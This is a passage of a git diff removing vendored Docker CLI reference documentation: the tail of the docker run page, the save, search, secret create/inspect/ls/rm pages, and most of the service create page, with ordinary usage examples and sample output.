-> the default `ulimits` set on the daemon. `as` option is disabled now. -> In other words, the following script is not supported: -> `$ docker run -it --ulimit as=1024 fedora /bin/bash` - -The values are sent to the appropriate `syscall` as they are set. -Docker doesn't perform any byte conversion. Take this into account when setting the values. - -#### For `nproc` usage - -Be careful setting `nproc` with the `ulimit` flag as `nproc` is designed by Linux to set the -maximum number of processes available to a user, not to a container. For example, start four -containers with `daemon` user: - - docker run -d -u daemon --ulimit nproc=3 busybox top - docker run -d -u daemon --ulimit nproc=3 busybox top - docker run -d -u daemon --ulimit nproc=3 busybox top - docker run -d -u daemon --ulimit nproc=3 busybox top - -The 4th container fails and reports "[8] System error: resource temporarily unavailable" error. -This fails because the caller set `nproc=3` resulting in the first three containers using up -the three processes quota set for the `daemon` user. - -### Stop container with signal (--stop-signal) - -The `--stop-signal` flag sets the system call signal that will be sent to the container to exit. -This signal can be a valid unsigned number that matches a position in the kernel's syscall table, for instance 9, -or a signal name in the format SIGNAME, for instance SIGKILL. - -### Optional security options (--security-opt) - -On Windows, this flag can be used to specify the `credentialspec` option. -The `credentialspec` must be in the format `file://spec.txt` or `registry://keyname`. - -### Stop container with timeout (--stop-timeout) - -The `--stop-timeout` flag sets the timeout (in seconds) that a pre-defined (see `--stop-signal`) system call -signal that will be sent to the container to exit. After timeout elapses the container will be killed with SIGKILL. - -### Specify isolation technology for container (--isolation) - -This option is useful in situations where you are running Docker containers on -Microsoft Windows. The `--isolation ` option sets a container's isolation -technology. On Linux, the only supported is the `default` option which uses -Linux namespaces. These two commands are equivalent on Linux: - -``` -$ docker run -d busybox top -$ docker run -d --isolation default busybox top -``` - -On Microsoft Windows, can take any of these values: - - -| Value | Description | -|-----------|---------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `default` | Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value. | -| `process` | Namespace isolation only. | -| `hyperv` | Hyper-V hypervisor partition-based isolation. | - -On Windows, the default isolation for client is `hyperv`, and for server is -`process`. Therefore when running on Windows server without a `daemon` option -set, these two commands are equivalent: -``` -$ docker run -d --isolation default busybox top -$ docker run -d --isolation process busybox top -``` - -If you have set the `--exec-opt isolation=hyperv` option on the Docker `daemon`, -if running on Windows server, any of these commands also result in `hyperv` isolation: - -``` -$ docker run -d --isolation default busybox top -$ docker run -d --isolation hyperv busybox top -``` - -### Configure namespaced kernel parameters (sysctls) at runtime - -The `--sysctl` sets namespaced kernel parameters (sysctls) in the -container. For example, to turn on IP forwarding in the containers -network namespace, run this command: - - $ docker run --sysctl net.ipv4.ip_forward=1 someimage - - -> **Note**: Not all sysctls are namespaced. Docker does not support changing sysctls -> inside of a container that also modify the host system. As the kernel -> evolves we expect to see more sysctls become namespaced. - -#### Currently supported sysctls - - `IPC Namespace`: - - kernel.msgmax, kernel.msgmnb, kernel.msgmni, kernel.sem, kernel.shmall, kernel.shmmax, kernel.shmmni, kernel.shm_rmid_forced - Sysctls beginning with fs.mqueue.* - - If you use the `--ipc=host` option these sysctls will not be allowed. - - `Network Namespace`: - Sysctls beginning with net.* - - If you use the `--network=host` option using these sysctls will not be allowed. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/save.md b/vendor/github.com/docker/docker/docs/reference/commandline/save.md deleted file mode 100644 index 88a5fed103..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/save.md +++ /dev/null @@ -1,45 +0,0 @@ ---- -title: "save" -description: "The save command description and usage" -keywords: "tarred, repository, backup" ---- - - - -# save - -```markdown -Usage: docker save [OPTIONS] IMAGE [IMAGE...] - -Save one or more images to a tar archive (streamed to STDOUT by default) - -Options: - --help Print usage - -o, --output string Write to a file, instead of STDOUT -``` - -Produces a tarred repository to the standard output stream. -Contains all parent layers, and all tags + versions, or specified `repo:tag`, for -each argument provided. - -It is used to create a backup that can then be used with `docker load` - - $ docker save busybox > busybox.tar - $ ls -sh busybox.tar - 2.7M busybox.tar - $ docker save --output busybox.tar busybox - $ ls -sh busybox.tar - 2.7M busybox.tar - $ docker save -o fedora-all.tar fedora - $ docker save -o fedora-latest.tar fedora:latest - -It is even useful to cherry-pick particular tags of an image repository - - $ docker save -o ubuntu.tar ubuntu:lucid ubuntu:saucy diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/search.md b/vendor/github.com/docker/docker/docs/reference/commandline/search.md deleted file mode 100644 index 31faf37375..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/search.md +++ /dev/null @@ -1,134 +0,0 @@ ---- -title: "search" -description: "The search command description and usage" -keywords: "search, hub, images" ---- - - - -# search - -```markdown -Usage: docker search [OPTIONS] TERM - -Search the Docker Hub for images - -Options: - -f, --filter value Filter output based on conditions provided (default []) - - is-automated=(true|false) - - is-official=(true|false) - - stars= - image has at least 'number' stars - --help Print usage - --limit int Max number of search results (default 25) - --no-trunc Don't truncate output -``` - -Search [Docker Hub](https://hub.docker.com) for images - -See [*Find Public Images on Docker Hub*](https://docs.docker.com/engine/tutorials/dockerrepos/#searching-for-images) for -more details on finding shared images from the command line. - -> **Note:** -> Search queries will only return up to 25 results - -## Examples - -### Search images by name - -This example displays images with a name containing 'busybox': - - $ docker search busybox - NAME DESCRIPTION STARS OFFICIAL AUTOMATED - busybox Busybox base image. 316 [OK] - progrium/busybox 50 [OK] - radial/busyboxplus Full-chain, Internet enabled, busybox made... 8 [OK] - odise/busybox-python 2 [OK] - azukiapp/busybox This image is meant to be used as the base... 2 [OK] - ofayau/busybox-jvm Prepare busybox to install a 32 bits JVM. 1 [OK] - shingonoide/archlinux-busybox Arch Linux, a lightweight and flexible Lin... 1 [OK] - odise/busybox-curl 1 [OK] - ofayau/busybox-libc32 Busybox with 32 bits (and 64 bits) libs 1 [OK] - peelsky/zulu-openjdk-busybox 1 [OK] - skomma/busybox-data Docker image suitable for data volume cont... 1 [OK] - elektritter/busybox-teamspeak Lightweight teamspeak3 container based on... 1 [OK] - socketplane/busybox 1 [OK] - oveits/docker-nginx-busybox This is a tiny NginX docker image based on... 0 [OK] - ggtools/busybox-ubuntu Busybox ubuntu version with extra goodies 0 [OK] - nikfoundas/busybox-confd Minimal busybox based distribution of confd 0 [OK] - openshift/busybox-http-app 0 [OK] - jllopis/busybox 0 [OK] - swyckoff/busybox 0 [OK] - powellquiring/busybox 0 [OK] - williamyeh/busybox-sh Docker image for BusyBox's sh 0 [OK] - simplexsys/busybox-cli-powered Docker busybox images, with a few often us... 0 [OK] - fhisamoto/busybox-java Busybox java 0 [OK] - scottabernethy/busybox 0 [OK] - marclop/busybox-solr - -### Display non-truncated description (--no-trunc) - -This example displays images with a name containing 'busybox', -at least 3 stars and the description isn't truncated in the output: - - $ docker search --stars=3 --no-trunc busybox - NAME DESCRIPTION STARS OFFICIAL AUTOMATED - busybox Busybox base image. 325 [OK] - progrium/busybox 50 [OK] - radial/busyboxplus Full-chain, Internet enabled, busybox made from scratch. Comes in git and cURL flavors. 8 [OK] - -## Limit search results (--limit) - -The flag `--limit` is the maximum number of results returned by a search. This value could -be in the range between 1 and 100. The default value of `--limit` is 25. - - -## Filtering - -The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there is more -than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`) - -The currently supported filters are: - -* stars (int - number of stars the image has) -* is-automated (true|false) - is the image automated or not -* is-official (true|false) - is the image official or not - - -### stars - -This example displays images with a name containing 'busybox' and at -least 3 stars: - - $ docker search --filter stars=3 busybox - NAME DESCRIPTION STARS OFFICIAL AUTOMATED - busybox Busybox base image. 325 [OK] - progrium/busybox 50 [OK] - radial/busyboxplus Full-chain, Internet enabled, busybox made... 8 [OK] - - -### is-automated - -This example displays images with a name containing 'busybox' -and are automated builds: - - $ docker search --filter is-automated busybox - NAME DESCRIPTION STARS OFFICIAL AUTOMATED - progrium/busybox 50 [OK] - radial/busyboxplus Full-chain, Internet enabled, busybox made... 8 [OK] - -### is-official - -This example displays images with a name containing 'busybox', at least -3 stars and are official builds: - - $ docker search --filter "is-official=true" --filter "stars=3" busybox - NAME DESCRIPTION STARS OFFICIAL AUTOMATED - progrium/busybox 50 [OK] - radial/busyboxplus Full-chain, Internet enabled, busybox made... 8 [OK] diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/secret_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/secret_create.md deleted file mode 100644 index aebcebbcdd..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/secret_create.md +++ /dev/null @@ -1,90 +0,0 @@ ---- -title: "secret create" -description: "The secret create command description and usage" -keywords: ["secret, create"] ---- - - - -# secret create - -```Markdown -Usage: docker secret create [OPTIONS] SECRET file|- - -Create a secret from a file or STDIN as content - -Options: - --help Print usage - -l, --label list Secret labels (default []) -``` - -Creates a secret using standard input or from a file for the secret content. You must run this -command on a manager node. - -## Examples - -### Create a secret - -```bash -$ echo | docker secret create my_secret - -mhv17xfe3gh6xc4rij5orpfds - -$ docker secret ls -ID NAME CREATED UPDATED SIZE -mhv17xfe3gh6xc4rij5orpfds my_secret 2016-10-27 23:25:43.909181089 +0000 UTC 2016-10-27 23:25:43.909181089 +0000 UTC 1679 -``` - -### Create a secret with a file - -```bash -$ docker secret create my_secret ./secret.json -mhv17xfe3gh6xc4rij5orpfds - -$ docker secret ls -ID NAME CREATED UPDATED SIZE -mhv17xfe3gh6xc4rij5orpfds my_secret 2016-10-27 23:25:43.909181089 +0000 UTC 2016-10-27 23:25:43.909181089 +0000 UTC 1679 -``` - -### Create a secret with labels - -```bash -$ docker secret create --label env=dev --label rev=20161102 my_secret ./secret.json -jtn7g6aukl5ky7nr9gvwafoxh - -$ docker secret inspect my_secret -[ - { - "ID": "jtn7g6aukl5ky7nr9gvwafoxh", - "Version": { - "Index": 541 - }, - "CreatedAt": "2016-11-03T20:54:12.924766548Z", - "UpdatedAt": "2016-11-03T20:54:12.924766548Z", - "Spec": { - "Name": "my_secret", - "Labels": { - "env": "dev", - "rev": "20161102" - }, - "Data": null - }, - "Digest": "sha256:4212a44b14e94154359569333d3fc6a80f6b9959dfdaff26412f4b2796b1f387", - "SecretSize": 1679 - } -] - -``` - - -## Related information - -* [secret inspect](secret_inspect.md) -* [secret ls](secret_ls.md) -* [secret rm](secret_rm.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/secret_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/secret_inspect.md deleted file mode 100644 index de878f74e4..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/secret_inspect.md +++ /dev/null @@ -1,85 +0,0 @@ ---- -title: "secret inspect" -description: "The secret inspect command description and usage" -keywords: ["secret, inspect"] ---- - - - -# secret inspect - -```Markdown -Usage: docker secret inspect [OPTIONS] SECRET [SECRET...] - -Display detailed information on one or more secrets - -Options: - -f, --format string Format the output using the given Go template - --help Print usage -``` - - -Inspects the specified secret. This command has to be run targeting a manager -node. - -By default, this renders all results in a JSON array. If a format is specified, -the given template will be executed for each result. - -Go's [text/template](http://golang.org/pkg/text/template/) package -describes all the details of the format. - -## Examples - -### Inspecting a secret by name or ID - -You can inspect a secret, either by its *name*, or *ID* - -For example, given the following secret: - -```bash -$ docker secret ls -ID NAME CREATED UPDATED -mhv17xfe3gh6xc4rij5orpfds secret.json 2016-10-27 23:25:43.909181089 +0000 UTC 2016-10-27 23:25:43.909181089 +0000 UTC -``` - -```bash -$ docker secret inspect secret.json -[ - { - "ID": "mhv17xfe3gh6xc4rij5orpfds", - "Version": { - "Index": 1198 - }, - "CreatedAt": "2016-10-27T23:25:43.909181089Z", - "UpdatedAt": "2016-10-27T23:25:43.909181089Z", - "Spec": { - "Name": "secret.json" - } - } -] -``` - -### Formatting secret output - -You can use the --format option to obtain specific information about a -secret. The following example command outputs the creation time of the -secret. - -```bash{% raw %} -$ docker secret inspect --format='{{.CreatedAt}}' mhv17xfe3gh6xc4rij5orpfds -2016-10-27 23:25:43.909181089 +0000 UTC -{% endraw %}``` - - -## Related information - -* [secret create](secret_create.md) -* [secret ls](secret_ls.md) -* [secret rm](secret_rm.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/secret_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/secret_ls.md deleted file mode 100644 index 6b34fc2146..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/secret_ls.md +++ /dev/null @@ -1,43 +0,0 @@ ---- -title: "secret ls" -description: "The secret ls command description and usage" -keywords: ["secret, ls"] ---- - - - -# secret ls - -```Markdown -Usage: docker secret ls [OPTIONS] - -List secrets - -Aliases: - ls, list - -Options: - -q, --quiet Only display IDs -``` - -Run this command on a manager node to list the secrets in the Swarm. - -## Examples - -```bash -$ docker secret ls -ID NAME CREATED UPDATED -mhv17xfe3gh6xc4rij5orpfds secret.json 2016-10-27 23:25:43.909181089 +0000 UTC 2016-10-27 23:25:43.909181089 +0000 UTC -``` -## Related information - -* [secret create](secret_create.md) -* [secret inspect](secret_inspect.md) -* [secret rm](secret_rm.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/secret_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/secret_rm.md deleted file mode 100644 index f504b1ba4f..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/secret_rm.md +++ /dev/null @@ -1,48 +0,0 @@ ---- -title: "secret rm" -description: "The secret rm command description and usage" -keywords: ["secret, rm"] ---- - - - -# secret rm - -```Markdown -Usage: docker secret rm SECRET [SECRET...] - -Remove one or more secrets - -Aliases: - rm, remove - -Options: - --help Print usage -``` - -Removes the specified secrets from the swarm. This command has to be run -targeting a manager node. - -This example removes a secret: - -```bash -$ docker secret rm secret.json -sapth4csdo5b6wz2p5uimh5xg -``` - -> **Warning**: Unlike `docker rm`, this command does not ask for confirmation -> before removing a secret. - - -## Related information - -* [secret create](secret_create.md) -* [secret inspect](secret_inspect.md) -* [secret ls](secret_ls.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_create.md deleted file mode 100644 index c9e298096b..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/service_create.md +++ /dev/null @@ -1,556 +0,0 @@ ---- -title: "service create" -description: "The service create command description and usage" -keywords: "service, create" ---- - - - -# service create - -```Markdown -Usage: docker service create [OPTIONS] IMAGE [COMMAND] [ARG...] - -Create a new service - -Options: - --constraint list Placement constraints (default []) - --container-label list Container labels (default []) - --dns list Set custom DNS servers (default []) - --dns-option list Set DNS options (default []) - --dns-search list Set custom DNS search domains (default []) - --endpoint-mode string Endpoint mode (vip or dnsrr) - -e, --env list Set environment variables (default []) - --env-file list Read in a file of environment variables (default []) - --group list Set one or more supplementary user groups for the container (default []) - --health-cmd string Command to run to check health - --health-interval duration Time between running the check (ns|us|ms|s|m|h) - --health-retries int Consecutive failures needed to report unhealthy - --health-timeout duration Maximum time to allow one check to run (ns|us|ms|s|m|h) - --help Print usage - --host list Set one or more custom host-to-IP mappings (host:ip) (default []) - --hostname string Container hostname - -l, --label list Service labels (default []) - --limit-cpu decimal Limit CPUs (default 0.000) - --limit-memory bytes Limit Memory (default 0 B) - --log-driver string Logging driver for service - --log-opt list Logging driver options (default []) - --mode string Service mode (replicated or global) (default "replicated") - --mount mount Attach a filesystem mount to the service - --name string Service name - --network list Network attachments (default []) - --no-healthcheck Disable any container-specified HEALTHCHECK - -p, --publish port Publish a port as a node port - --replicas uint Number of tasks - --reserve-cpu decimal Reserve CPUs (default 0.000) - --reserve-memory bytes Reserve Memory (default 0 B) - --restart-condition string Restart when condition is met (none, on-failure, or any) - --restart-delay duration Delay between restart attempts (ns|us|ms|s|m|h) - --restart-max-attempts uint Maximum number of restarts before giving up - --restart-window duration Window used to evaluate the restart policy (ns|us|ms|s|m|h) - --secret secret Specify secrets to expose to the service - --stop-grace-period duration Time to wait before force killing a container (ns|us|ms|s|m|h) - -t, --tty Allocate a pseudo-TTY - --update-delay duration Delay between updates (ns|us|ms|s|m|h) (default 0s) - --update-failure-action string Action on update failure (pause|continue) (default "pause") - --update-max-failure-ratio float Failure rate to tolerate during an update - --update-monitor duration Duration after each task update to monitor for failure (ns|us|ms|s|m|h) (default 0s) - --update-parallelism uint Maximum number of tasks updated simultaneously (0 to update all at once) (default 1) - -u, --user string Username or UID (format: [:]) - --with-registry-auth Send registry authentication details to swarm agents - -w, --workdir string Working directory inside the container -``` - -Creates a service as described by the specified parameters. You must run this -command on a manager node. - -## Examples - -### Create a service - -```bash -$ docker service create --name redis redis:3.0.6 -dmu1ept4cxcfe8k8lhtux3ro3 - -$ docker service create --mode global --name redis2 redis:3.0.6 -a8q9dasaafudfs8q8w32udass - -$ docker service ls -ID NAME MODE REPLICAS IMAGE -dmu1ept4cxcf redis replicated 1/1 redis:3.0.6 -a8q9dasaafud redis2 global 1/1 redis:3.0.6 -``` - -### Create a service with 5 replica tasks (--replicas) - -Use the `--replicas` flag to set the number of replica tasks for a replicated -service. The following command creates a `redis` service with `5` replica tasks: - -```bash -$ docker service create --name redis --replicas=5 redis:3.0.6 -4cdgfyky7ozwh3htjfw0d12qv -``` - -The above command sets the *desired* number of tasks for the service. Even -though the command returns immediately, actual scaling of the service may take -some time. The `REPLICAS` column shows both the *actual* and *desired* number -of replica tasks for the service. - -In the following example the desired state is `5` replicas, but the current -number of `RUNNING` tasks is `3`: - -```bash -$ docker service ls -ID NAME MODE REPLICAS IMAGE -4cdgfyky7ozw redis replicated 3/5 redis:3.0.7 -``` - -Once all the tasks are created and `RUNNING`, the actual number of tasks is -equal to the desired number: - -```bash -$ docker service ls -ID NAME MODE REPLICAS IMAGE -4cdgfyky7ozw redis replicated 5/5 redis:3.0.7 -``` - -### Create a service with secrets -Use the `--secret` flag to give a container access to a -[secret](secret_create.md). - -Create a service specifying a secret: - -```bash -$ docker service create --name redis --secret secret.json redis:3.0.6 -4cdgfyky7ozwh3htjfw0d12qv -``` - -Create a service specifying the secret, target, user/group ID and mode: - -```bash -$ docker service create --name redis \ - --secret source=ssh-key,target=ssh \ - --secret source=app-key,target=app,uid=1000,gid=1001,mode=0400 \ - redis:3.0.6 -4cdgfyky7ozwh3htjfw0d12qv -``` - -Secrets are located in `/run/secrets` in the container. If no target is -specified, the name of the secret will be used as the in memory file in the -container. If a target is specified, that will be the filename. In the -example above, two files will be created: `/run/secrets/ssh` and -`/run/secrets/app` for each of the secret targets specified. - -### Create a service with a rolling update policy - -```bash -$ docker service create \ - --replicas 10 \ - --name redis \ - --update-delay 10s \ - --update-parallelism 2 \ - redis:3.0.6 -``` - -When you run a [service update](service_update.md), the scheduler updates a -maximum of 2 tasks at a time, with `10s` between updates. For more information, -refer to the [rolling updates -tutorial](https://docs.docker.com/engine/swarm/swarm-tutorial/rolling-update/). - -### Set environment variables (-e, --env) - -This sets environmental variables for all tasks in a service. For example: - -```bash -$ docker service create --name redis_2 --replicas 5 --env MYVAR=foo redis:3.0.6 -``` - -### Create a docker service with specific hostname (--hostname) - -This option sets the docker service containers hostname to a specific string. For example: -```bash -$ docker service create --name redis --hostname myredis redis:3.0.6 -``` -### Set metadata on a service (-l, --label) - -A label is a `key=value` pair that applies metadata to a service. To label a -service with two labels: - -```bash -$ docker service create \ - --name redis_2 \ - --label com.example.foo="bar" - --label bar=baz \ - redis:3.0.6 -``` - -For more information about labels, refer to [apply custom -metadata](https://docs.docker.com/engine/userguide/labels-custom-metadata/). - -### Add bind-mounts or volumes - -Docker supports two different kinds of mounts, which allow containers to read to -or write from files or directories on other containers or the host operating -system. These types are _data volumes_ (often referred to simply as volumes) and -_bind-mounts_. - -Additionally, Docker also supports tmpfs mounts. - -A **bind-mount** makes a file or directory on the host available to the -container it is mounted within. A bind-mount may be either read-only or -read-write. For example, a container might share its host's DNS information by -means of a bind-mount of the host's `/etc/resolv.conf` or a container might -write logs to its host's `/var/log/myContainerLogs` directory. If you use -bind-mounts and your host and containers have different notions of permissions, -access controls, or other such details, you will run into portability issues. - -A **named volume** is a mechanism for decoupling persistent data needed by your -container from the image used to create the container and from the host machine. -Named volumes are created and managed by Docker, and a named volume persists -even when no container is currently using it. Data in named volumes can be -shared between a container and the host machine, as well as between multiple -containers. Docker uses a _volume driver_ to create, manage, and mount volumes. -You can back up or restore volumes using Docker commands. - -A **tmpfs** mounts a tmpfs inside a container for volatile data. - -Consider a situation where your image starts a lightweight web server. You could -use that image as a base image, copy in your website's HTML files, and package -that into another image. Each time your website changed, you'd need to update -the new image and redeploy all of the containers serving your website. A better -solution is to store the website in a named volume which is attached to each of -your web server containers when they start. To update the website, you just -update the named volume. - -For more information about named volumes, see -[Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/). - -The following table describes options which apply to both bind-mounts and named -volumes in a service: - -| Option | Required | Description -|:-----------------------------------------|:--------------------------|:----------------------------------------------------------------------------------------- -| **type** | | The type of mount, can be either `volume`, `bind`, or `tmpfs`. Defaults to `volume` if no type is specified.

  • `volume`: mounts a [managed volume](volume_create.md) into the container.
  • `bind`: bind-mounts a directory or file from the host into the container.
  • `tmpfs`: mount a tmpfs in the container
-| **src** or **source** | for `type=bind` only |
  • `type=volume`: `src` is an optional way to specify the name of the volume (for example, `src=my-volume`). If the named volume does not exist, it is automatically created. If no `src` is specified, the volume is assigned a random name which is guaranteed to be unique on the host, but may not be unique cluster-wide. A randomly-named volume has the same lifecycle as its container and is destroyed when the *container* is destroyed (which is upon `service update`, or when scaling or re-balancing the service).
  • `type=bind`: `src` is required, and specifies an absolute path to the file or directory to bind-mount (for example, `src=/path/on/host/`). An error is produced if the file or directory does not exist.
  • `type=tmpfs`: `src` is not supported.
-| **dst** or **destination** or **target** | yes | Mount path inside the container, for example `/some/path/in/container/`. If the path does not exist in the container's filesystem, the Engine creates a directory at the specified location before mounting the volume or bind-mount. -| **readonly** or **ro** | | The Engine mounts binds and volumes `read-write` unless `readonly` option is given when mounting the bind or volume.

  • `true` or `1` or no value: Mounts the bind or volume read-only.
  • `false` or `0`: Mounts the bind or volume read-write.
- -#### Bind Propagation - -Bind propagation refers to whether or not mounts created within a given -bind-mount or named volume can be propagated to replicas of that mount. Consider -a mount point `/mnt`, which is also mounted on `/tmp`. The propation settings -control whether a mount on `/tmp/a` would also be available on `/mnt/a`. Each -propagation setting has a recursive counterpoint. In the case of recursion, -consider that `/tmp/a` is also mounted as `/foo`. The propagation settings -control whether `/mnt/a` and/or `/tmp/a` would exist. - -The `bind-propagation` option defaults to `rprivate` for both bind-mounts and -volume mounts, and is only configurable for bind-mounts. In other words, named -volumes do not support bind propagation. - -- **`shared`**: Sub-mounts of the original mount are exposed to replica mounts, - and sub-mounts of replica mounts are also propagated to the - original mount. -- **`slave`**: similar to a shared mount, but only in one direction. If the - original mount exposes a sub-mount, the replica mount can see it. - However, if the replica mount exposes a sub-mount, the original - mount cannot see it. -- **`private`**: The mount is private. Sub-mounts within it are not exposed to - replica mounts, and sub-mounts of replica mounts are not - exposed to the original mount. -- **`rshared`**: The same as shared, but the propagation also extends to and from - mount points nested within any of the original or replica mount - points. -- **`rslave`**: The same as `slave`, but the propagation also extends to and from - mount points nested within any of the original or replica mount - points. -- **`rprivate`**: The default. The same as `private`, meaning that no mount points - anywhere within the original or replica mount points propagate - in either direction. - -For more information about bind propagation, see the -[Linux kernel documentation for shared subtree](https://www.kernel.org/doc/Documentation/filesystems/sharedsubtree.txt). - -#### Options for Named Volumes -The following options can only be used for named volumes (`type=volume`); - -| Option | Description -|:----------------------|:-------------------------------------------------------------------------------------------------------------------- -| **volume-driver** | Name of the volume-driver plugin to use for the volume. Defaults to ``"local"``, to use the local volume driver to create the volume if the volume does not exist. -| **volume-label** | One or more custom metadata ("labels") to apply to the volume upon creation. For example, `volume-label=mylabel=hello-world,my-other-label=hello-mars`. For more information about labels, refer to [apply custom metadata](https://docs.docker.com/engine/userguide/labels-custom-metadata/). -| **volume-nocopy** | By default, if you attach an empty volume to a container, and files or directories already existed at the mount-path in the container (`dst`), the Engine copies those files and directories into the volume, allowing the host to access them. Set `volume-nocopy` to disables copying files from the container's filesystem to the volume and mount the empty volume.

A value is optional:
  • `true` or `1`: Default if you do not provide a value. Disables copying.
  • `false` or `0`: Enables copying.
-| **volume-opt** | Options specific to a given volume driver, which will be passed to the driver when creating the volume. Options are provided as a comma-separated list of key/value pairs, for example, `volume-opt=some-option=some-value,some-other-option=some-other-value`. For available options for a given driver, refer to that driver's documentation. - -#### Options for tmpfs -The following options can only be used for tmpfs mounts (`type=tmpfs`); - -| Option | Description -|:----------------------|:-------------------------------------------------------------------------------------------------------------------- -| **tmpfs-size** | Size of the tmpfs mount in bytes. Unlimited by default in Linux. -| **tmpfs-mode** | File mode of the tmpfs in octal. (e.g. `"700"` or `"0700"`.) Defaults to ``"1777"`` in Linux. - -#### Differences between "--mount" and "--volume" - -The `--mount` flag supports most options that are supported by the `-v` -or `--volume` flag for `docker run`, with some important exceptions: - -- The `--mount` flag allows you to specify a volume driver and volume driver - options *per volume*, without creating the volumes in advance. In contrast, - `docker run` allows you to specify a single volume driver which is shared - by all volumes, using the `--volume-driver` flag. - -- The `--mount` flag allows you to specify custom metadata ("labels") for a volume, - before the volume is created. - -- When you use `--mount` with `type=bind`, the host-path must refer to an *existing* - path on the host. The path will not be created for you and the service will fail - with an error if the path does not exist. - -- The `--mount` flag does not allow you to relabel a volume with `Z` or `z` flags, - which are used for `selinux` labeling. - -#### Create a service using a named volume - -The following example creates a service that uses a named volume: - -```bash -$ docker service create \ - --name my-service \ - --replicas 3 \ - --mount type=volume,source=my-volume,destination=/path/in/container,volume-label="color=red",volume-label="shape=round" \ - nginx:alpine -``` - -For each replica of the service, the engine requests a volume named "my-volume" -from the default ("local") volume driver where the task is deployed. If the -volume does not exist, the engine creates a new volume and applies the "color" -and "shape" labels. - -When the task is started, the volume is mounted on `/path/in/container/` inside -the container. - -Be aware that the default ("local") volume is a locally scoped volume driver. -This means that depending on where a task is deployed, either that task gets a -*new* volume named "my-volume", or shares the same "my-volume" with other tasks -of the same service. Multiple containers writing to a single shared volume can -cause data corruption if the software running inside the container is not -designed to handle concurrent processes writing to the same location. Also take -into account that containers can be re-scheduled by the Swarm orchestrator and -be deployed on a different node. - -#### Create a service that uses an anonymous volume - -The following command creates a service with three replicas with an anonymous -volume on `/path/in/container`: - -```bash -$ docker service create \ - --name my-service \ - --replicas 3 \ - --mount type=volume,destination=/path/in/container \ - nginx:alpine -``` - -In this example, no name (`source`) is specified for the volume, so a new volume -is created for each task. This guarantees that each task gets its own volume, -and volumes are not shared between tasks. Anonymous volumes are removed after -the task using them is complete. - -#### Create a service that uses a bind-mounted host directory - -The following example bind-mounts a host directory at `/path/in/container` in -the containers backing the service: - -```bash -$ docker service create \ - --name my-service \ - --mount type=bind,source=/path/on/host,destination=/path/in/container \ - nginx:alpine -``` - -### Set service mode (--mode) - -The service mode determines whether this is a _replicated_ service or a _global_ -service. A replicated service runs as many tasks as specified, while a global -service runs on each active node in the swarm. - -The following command creates a global service: - -```bash -$ docker service create \ - --name redis_2 \ - --mode global \ - redis:3.0.6 -``` - -### Specify service constraints (--constraint) - -You can limit the set of nodes where a task can be scheduled by defining -constraint expressions. Multiple constraints find nodes that satisfy every -expression (AND match). Constraints can match node or Docker Engine labels as -follows: - -| node attribute | matches | example | -|:----------------|:--------------------------|:------------------------------------------------| -| node.id | node ID | `node.id == 2ivku8v2gvtg4` | -| node.hostname | node hostname | `node.hostname != node-2` | -| node.role | node role: manager | `node.role == manager` | -| node.labels | user defined node labels | `node.labels.security == high` | -| engine.labels | Docker Engine's labels | `engine.labels.operatingsystem == ubuntu 14.04` | - -`engine.labels` apply to Docker Engine labels like operating system, -drivers, etc. Swarm administrators add `node.labels` for operational purposes by -using the [`docker node update`](node_update.md) command. - -For example, the following limits tasks for the redis service to nodes where the -node type label equals queue: - -```bash -$ docker service create \ - --name redis_2 \ - --constraint 'node.labels.type == queue' \ - redis:3.0.6 -``` - -### Attach a service to an existing network (--network) - -You can use overlay networks to connect one or more services within the swarm. - -First, create an overlay network on a manager node the docker network create -command: - -```bash -$ docker network create --driver overlay my-network - -etjpu59cykrptrgw0z0hk5snf -``` - -After you create an overlay network in swarm mode, all manager nodes have -access to the network. - -When you create a service and pass the --network flag to attach the service to -the overlay network: - -```bash -$ docker service create \ - --replicas 3 \ - --network my-network \ - --name my-web \ - nginx - -716thylsndqma81j6kkkb5aus -``` - -The swarm extends my-network to each node running the service. - -Containers on the same network can access each other using -[service discovery](https://docs.docker.com/engine/swarm/networking/#use-swarm-mode-service-discovery). - -### Publish service ports externally to the swarm (-p, --publish) - -You can publish service ports to make them available externally to the swarm -using the `--publish` flag: - -```bash -$ docker service create --publish : nginx -``` - -For example: - -```bash -$ docker service create --name my_web --replicas 3 --publish 8080:80 nginx -``` - -When you publish a service port, the swarm routing mesh makes the service -accessible at the target port on every node regardless if there is a task for -the service running on the node. For more information refer to -[Use swarm mode routing mesh](https://docs.docker.com/engine/swarm/ingress/). - -### Publish a port for TCP only or UDP only - -By default, when you publish a port, it is a TCP port. You can -specifically publish a UDP port instead of or in addition to a TCP port. When -you publish both TCP and UDP ports, Docker 1.12.2 and earlier require you to -add the suffix `/tcp` for TCP ports. Otherwise it is optional. - -#### TCP only - -The following two commands are equivalent. - -```bash -$ docker service create --name dns-cache -p 53:53 dns-cache - -$ docker service create --name dns-cache -p 53:53/tcp dns-cache -``` - -#### TCP and UDP - -```bash -$ docker service create --name dns-cache -p 53:53/tcp -p 53:53/udp dns-cache -``` - -#### UDP only - -```bash -$ docker service create --name dns-cache -p 53:53/udp dns-cache -``` - -### Create services using templates - -You can use templates for some flags of `service create`, using the syntax -provided by the Go's 